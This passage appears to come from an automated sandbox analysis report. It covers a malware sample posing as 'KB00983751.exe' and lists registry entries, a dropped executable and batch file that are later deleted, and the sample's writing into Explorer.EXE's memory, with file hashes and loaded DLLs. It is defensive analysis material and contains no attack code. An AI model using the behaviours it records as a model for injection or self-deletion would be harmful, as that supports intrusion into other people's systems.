Value Name: [ aFormatTagCache ], Value: [ 0x010000001000000006000000120000000700000012000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
Value Name: [ cFormatTags ], Value: [ 3 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg711 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ aFormatTagCache ], Value: [ 0x0100000010000000420000001c000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msg723 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000003100000014000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.msgsm610 ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000003001000016000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.sl_anet ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ aFormatTagCache ], Value: [ 0x01000000100000002200000032000000 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ cFilterTags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ cFormatTags ], Value: [ 2 ], 1 time
Key: [ HKLM\Software\Microsoft\AudioCompressionManager\DriverCache\msacm.trspch ],
Value Name: [ fdwSupport ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ AutoRun ], Value: [ ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ CompletionChar ], Value: [ 64 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ DefaultColor ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ EnableExtensions ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Microsoft\Command Processor ],
Value Name: [ PathCompletionChar ], Value: [ 64 ], 1 time
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ midimapper ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.iac2 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.imaadpcm ], Value: [ ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.l3acm ], Value: [ C:\WINDOWS\system32\l3codeca.acm ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msadpcm ], Value: [ ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msaudio1 ], Value: [ msaud32.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msg711 ], Value: [ msg711.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msg723 ], Value: [ ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.msgsm610 ], Value: [ msgsm32.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.sl_anet ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ msacm.trspch ], Value: [ tssoft32.acm ], 3 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.I420 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.M261 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.M263 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.cvid ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv31 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv32 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv41 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iv50 ], Value: [ ], 1 time
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.iyuv ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.mrle ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.msvc ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.uyvy ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.yuy2 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.yvu9 ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ vidc.yvyu ], Value: [ ], 2 times
Key: [ HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32 ],
Value Name: [ wavemapper ], Value: [ ], 2 times
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ DefaultLevel ], Value: [ 262144 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ PolicyScope ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers ],
Value Name: [ TransparentEnabled ], Value: [ 1 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ ItemData ], Value: [ 0x5eab304f957a49896a006c1c31154015 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ ItemSize ], Value: [ 779 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ ItemData ], Value: [ 0x67b0d48b343a3fd3bce9dc646704f394 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ ItemSize ], Value: [ 517 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ ItemData ], Value: [ 0x327802dcfef8c893dc8ab006dd847d1d ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ ItemSize ], Value: [ 918 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ ItemData ], Value: [ 0xbd9a2adb42ebd8560e250e4df8162f67 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ ItemSize ], Value: [ 229 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ HashAlg ], Value: [ 32771 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ ItemData ], Value: [ 0x386b085f84ecf669d36b956a22c01e80 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ ItemSize ], Value: [ 370 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ],
Value Name: [ ItemData ], Value: [ %HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK* ], 1 time
Key: [ HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} ],
Value Name: [ SaferFlags ], Value: [ 0 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName ],
Value Name: [ ComputerName ], Value: [ PC ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\MediaProperties\PrivateProperties\Joystick\Winmm ],
Value Name: [ wheel ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Nls\Language Groups ],
Value Name: [ 1 ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\Nls\Locale ],
Value Name: [ 00000C07 ], Value: [ 1 ], 1 time
Key: [ HKLM\System\CurrentControlSet\Control\ProductOptions ],
Value Name: [ ProductType ], Value: [ WinNT ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ],
Value Name: [ CompletionChar ], Value: [ 9 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ],
Value Name: [ DefaultColor ], Value: [ 0 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Command Processor ],
Value Name: [ EnableExtensions ], Value: [ 1 ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Multimedia\Audio ],
Value Name: [ SystemFormats ], Value: [ CD Quality,Radio Quality,Telephone Quality ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders ],
Value Name: [ Cache ], Value: [ C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ Local Settings ], Value: [ %USERPROFILE%\Local Settings ], 1 time
Key: [ HKU\S-1-5-21-842925246-1425521274-308236825-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
Value Name: [ Personal ], Value: [ %USERPROFILE%\My Documents ], 1 time
[=============================================================================]
4.b) cmd.exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Deleted:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ C:\bc9deebcb0.exe ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ PIPE\lsarpc ]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File System Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ C:\Program Files\Common Files\ ], Control Code: [ 0x00090028 ], 1 time
File: [ PIPE\lsarpc ], Control Code: [ 0x0011C017 ], 4 times
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Device Control Communication:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File: [ \Device\KsecDD ], Control Code: [ 0x00390008 ], 1 time
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
Memory Mapped Files:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
File Name: [ C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\POS1.tmp.BAT ]
File Name: [ C:\WINDOWS\AppPatch\AcGenral.DLL ]
File Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ]
File Name: [ C:\WINDOWS\WindowsShell.Manifest ]
File Name: [ C:\WINDOWS\system32\MSACM32.dll ]
File Name: [ C:\WINDOWS\system32\SHELL32.dll ]
File Name: [ C:\WINDOWS\system32\ShimEng.dll ]
File Name: [ C:\WINDOWS\system32\UxTheme.dll ]
File Name: [ C:\WINDOWS\system32\WINMM.dll ]
File Name: [ C:\WINDOWS\system32\comctl32.dll ]
File Name: [ C:\Windows\AppPatch\sysmain.sdb ]
[#############################################################################]
5. Explorer.EXE
[#############################################################################]
[=============================================================================]
General information about this executable
[=============================================================================]
Analysis Reason: KB00983751.exe wrote to the virtual memory of this process
Filename: Explorer.EXE
MD5: 12896823fb95bfb3dc9b46bcaedc9923
SHA-1: 9d2bf84874abc5b6e9a2744b7865c193c08d362f
File Size: 1033728 Bytes
Command Line: C:\WINDOWS\Explorer.EXE
Process-status
at analysis end: alive
Exit Code: 0
[=============================================================================]
Load-time Dlls
[=============================================================================]
Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
Base Address: [0x7C900000 ], Size: [0x000AF000 ]
Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
Base Address: [0x7C800000 ], Size: [0x000F6000 ]
Module Name: [ C:\WINDOWS\system32\ADVAPI32.dll ],
Base Address: [0x77DD0000 ], Size: [0x0009B000 ]
Module Name: [ C:\WINDOWS\system32\RPCRT4.dll ],
Base Address: [0x77E70000 ], Size: [0x00092000 ]
Module Name: [ C:\WINDOWS\system32\Secur32.dll ],
Base Address: [0x77FE0000 ], Size: [0x00011000 ]
Module Name: [ C:\WINDOWS\system32\BROWSEUI.dll ],
Base Address: [0x75F80000 ], Size: [0x000FD000 ]
Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
Base Address: [0x77F10000 ], Size: [0x00049000 ]
Module Name: [ C:\WINDOWS\system32\USER32.dll ],
Base Address: [0x7E410000 ], Size: [0x00091000 ]
Module Name: [ C:\WINDOWS\system32\msvcrt.dll ],
Base Address: [0x77C10000 ], Size: [0x00058000 ]
Module Name: [ C:\WINDOWS\system32\ole32.dll ],
Base Address: [0x774E0000 ], Size: [0x0013D000 ]
Module Name: [ C:\WINDOWS\system32\SHLWAPI.dll ],
Base Address: [0x77F60000 ], Size: [0x00076000 ]
Module Name: [ C:\WINDOWS\system32\OLEAUT32.dll ],
Base Address: [0x77120000 ], Size: [0x0008B000 ]
Module Name: [ C:\WINDOWS\system32\SHDOCVW.dll ],
Base Address: [0x7E290000 ], Size: [0x00171000 ]
Module Name: [ C:\WINDOWS\system32\CRYPT32.dll ],
Base Address: [0x77A80000 ], Size: [0x00095000 ]
Module Name: [ C:\WINDOWS\system32\MSASN1.dll ],
Base Address: [0x77B20000 ], Size: [0x00012000 ]
Module Name: [ C:\WINDOWS\system32\CRYPTUI.dll ],
Base Address: [0x754D0000 ], Size: [0x00080000 ]
Module Name: [ C:\WINDOWS\system32\NETAPI32.dll ],
Base Address: [0x5B860000 ], Size: [0x00055000 ]
Module Name: [ C:\WINDOWS\system32\VERSION.dll ],
Base Address: [0x77C00000 ], Size: [0x00008000 ]
Module Name: [ C:\WINDOWS\system32\WININET.dll ],
Base Address: [0x771B0000 ], Size: [0x000AA000 ]
Module Name: [ C:\WINDOWS\system32\WINTRUST.dll ],
Base Address: [0x76C30000 ], Size: [0x0002E000 ]
Module Name: [ C:\WINDOWS\system32\IMAGEHLP.dll ],
Base Address: [0x76C90000 ], Size: [0x00028000 ]
Module Name: [ C:\WINDOWS\system32\WLDAP32.dll ],
Base Address: [0x76F60000 ], Size: [0x0002C000 ]
Module Name: [ C:\WINDOWS\system32\SHELL32.dll ],
Base Address: [0x7C9C0000 ], Size: [0x00817000 ]
Module Name: [ C:\WINDOWS\system32\UxTheme.dll ],
Base Address: [0x5AD70000 ], Size: [0x00038000 ]
Module Name: [ C:\WINDOWS\system32\ShimEng.dll ],
Base Address: [0x5CB70000 ], Size: [0x00026000 ]
Module Name: [ C:\WINDOWS\AppPatch\AcGenral.DLL ],
Base Address: [0x6F880000 ], Size: [0x001CA000 ]
Module Name: [ C:\WINDOWS\system32\WINMM.dll ],
Base Address: [0x76B40000 ], Size: [0x0002D000 ]
Module Name: [ C:\WINDOWS\system32\MSACM32.dll ],
Base Address: [0x77BE0000 ], Size: [0x00015000 ]
Module Name: [ C:\WINDOWS\system32\USERENV.dll ],
Base Address: [0x769C0000 ], Size: [0x000B4000 ]
Module Name: [ C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll ],
Base Address: [0x773D0000 ], Size: [0x00103000 ]
Module Name: [ C:\WINDOWS\system32\comctl32.dll ],
Base Address: [0x5D090000 ], Size: [0x0009A000 ]
Module Name: [ C:\WINDOWS\system32\appHelp.dll ],
Base Address: [0x77B40000 ], Size: [0x00022000 ]
Module Name: [ C:\WINDOWS\system32\CLBCATQ.DLL ],
Base Address: [0x76FD0000 ], Size: [0x0007F000 ]
Module Name: [ C:\WINDOWS\system32\COMRes.dll ],
Base Address: [0x77050000 ], Size: [0x000C5000 ]
Module Name: [ C:\WINDOWS\System32\cscui.dll ],
Base Address: [0x77A20000 ], Size: [0x00054000 ]
Module Name: [ C:\WINDOWS\System32\CSCDLL.dll ],
Base Address: [0x76600000 ], Size: [0x0001D000 ]
Module Name: [ C:\WINDOWS\system32\themeui.dll ],
Base Address: [0x5BA60000 ], Size: [0x00071000 ]
Module Name: [ C:\WINDOWS\system32\MSIMG32.dll ],
Base Address: [0x76380000 ], Size: [0x00005000 ]
Module Name: [ C:\WINDOWS\system32\xpsp2res.dll ],
Base Address: [0x00AC0000 ], Size: [0x002C5000 ]
Module Name: [ C:\WINDOWS\system32\actxprxy.dll ],
Base Address: [0x71D40000 ], Size: [0x0001B000 ]
Module Name: [ C:\WINDOWS\system32\msutb.dll ],
Base Address: [0x5FC10000 ], Size: [0x00033000 ]
Module Name: [ C:\WINDOWS\system32\MSCTF.dll ],
Base Address: [0x74720000 ], Size: [0x0004C000 ]
Module Name: [ C:\WINDOWS\system32\urlmon.dll ],
Base Address: [0x7E1E0000 ], Size: [0x000A2000 ]